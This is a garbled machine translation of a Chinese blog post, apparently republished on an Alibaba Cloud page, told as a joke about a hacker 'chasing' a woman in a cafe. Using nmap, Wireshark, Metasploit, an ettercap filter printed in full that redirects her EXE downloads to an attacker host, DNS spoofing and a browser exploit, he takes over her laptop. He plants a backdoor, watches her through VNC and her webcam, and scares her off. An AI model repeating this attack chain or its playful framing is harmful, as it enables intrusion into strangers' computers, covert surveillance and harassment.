Posture learning: hacker chasing girl

Source: Internet
Author: User
Tags dns spoofing

Posture learning: hacker chasing girl


As we all know, hackers are technology houses. Under the strong radiation of computers, the technology houses will sooner or later become the "Silk" in everyone's mind. Of course, hackers do not have a girlfriend. But is it true that I want to be a cool without a girlfriend? Of course not. We also need to be a "happy" hacker, Which is mysterious and can appear in any corner of the earth. Of course, Mars can also go, in the eyes of a hacker, there is nothing about privacy for him, because there is no such word, "no girlfriend, it's ridiculous!" "Don't you know? As long as my female is my girlfriend, "Only stood up and looked at us seriously and said that Only my college classmates and a very good hacker (hacker? He is a dick.) sometimes, when people sit together, they laugh at him for not finding a girlfriend. They get married one by one, and even some children go to elementary school. Only he is relatively introverted. He doesn't talk very much at ordinary times. Everyone has been joking with him. He is also used to it. Sometimes he just smiled and skipped, so he won't care about anything at all! Everyone was scared when they saw that the Only thing was so serious that the whole coffee shop was quiet. Later, a girl at the next table laughed and laughed at the sentence he just said, only a little blushing, calmly sat down, "you see! You brag and make me laugh. "" You asked her to be your girlfriend ".............. all kinds of mocking words make Only finally unable to help, Only opened the notebook on the table and looked at its own IP Address:

Then nmap is used to detect hosts with active wifi memory.

According to the analysis, 192.168.169.119425169.254 is supposed to be a vro19192.198.168.130 and its own host. The rest should be the host of other users in the cafe. "What are you doing?" Everyone is curious. "You didn't ask the girl to do it my girlfriend? Look at it. "Only with an evil smile, I turned to my sister at the next table, who was writing something (this should be the case) only I guess I want to get my sister's computer. I only scanned all the computers in the cafe. only these computers are online, so one of them must be a sister's host. Now, you only need to confirm that it is a sister's host. The simplest way is to ask? (Apparently not possible, my sister is not stupid.) If my sister is browsing a variety of web pages, she may be able to find out which is her computer through sniffing data. 0nly opened wireshark for packet capture and sniffing, because many hosts have a large number of data packets, it is time-consuming and labor-consuming to analyze data. Only has been staring at my sister and seems to be waiting for something, all of a sudden, he came up with a strange smile, "that's it." Let's see it all together.

"How do you know?" "She just logged on to the mailbox and sent an email." Only you are really cool. I have served you! I confirmed that my sister's IP address is 192.168.169.131. From the sniffing, I Only learned that my sister often sent emails and posted Weibo via QQ mail. I know that my sister's QQ and Weibo accounts are not enough to meet the requirements, he turned on nmap and detected the operating system of his sister.

If you use XP, you can use ettercap to cheat the trojan and then get the host permissions of the sister. Only metasploit generates a Trojan horse.




Only enable ettercap to prepare for man-in-the-middle attacks. First, create a rule.

# replace rmccurdy with your website# replace the url with what ever exe you likeif (ip.proto == TCP && tcp.dst == 80) {if (search(DATA.data, "Accept-Encoding")) {replace("Accept-Encoding", "Accept-Rubbish!");# note: replacement string is same length as original stringmsg("zapped Accept-Encoding!\n");}}if (ip.proto == TCP && tcp.src == 80) {replace("keep-alive", "close" ");replace("Keep-Alive", "close" ");} if (ip.proto == TCP && search(DATA.data, ": application") ){# enable for logging log(DECODED.data, "/tmp/log.log");msg("found EXE\n");# "Win32" is the first part of the exe example:# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..if (search(DATA.data, "Win32")) {msg("doing nothing\n");} else {replace("200 OK", "301 Moved PermanentlyLocation: http://www.xxx.com/exe.exe");msg("redirect success\n");}}


And then get rid of


Finally, compile

Then cheat

No matter what you download, sister paper will replace it with our Trojan to download and run it, and we will be able to get the permission (of course, the trojan should first be kill-free). This is similar.


So when the girl downloads something and runs our program, it will attack it (for fear that the girl will not be fooled) as I learned earlier that my sister was using XP, Only the Web horse that attacked IE browser was generated.



Select the Attack Module Based on the target situation and then use ettercap for DNS Spoofing


Edit our local webpage and write our Trojan code.

This is the case when a sister accesses any www webpage.

In a short time, my sister caught the Only trap.


Everything can be done. Let's take a look at what the girl is doing to enable VNC.


Only staring at it for half an hour. After seeing what the girl was doing, 0nly kept a persistent backdoor and opened 3389 with remote control Trojans (Only prefers this one)



Then he came up with an evil idea (he wanted to see what the girl looked like, because she was always sitting on our back). Although she opened her camera and obtained a photo of her sister, it was far from satisfying Only

He wants a camera.

 


Only satisfied with the smile, but immediately began to face again, as if to think of something unhappy, continue typing on the keyboard to edit the local page (I know what he is doing)

DNS Spoofing Enabled


When a girl accesses any www website

At the same time, Only made another prank

This pop-up window appears on the girl's desktop.

When my sister saw a picture of herself on the webpage and a pop-up window like this, she was scared and looked around, immediately shut down the computer and left the cafe. "My sister was scared away by you." "Ah" Only this will immerse him in his "work". He was a little proud. He heard that he scared her away, there was another loss, but Only a backdoor was left on the sister's computer. "Let's go." Only said, And then we rushed out to clean up and ran out. We all seemed to find something, together, I laughed and went out. What method will I use to continue chasing my sister? How is the hacker's method unusual?

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.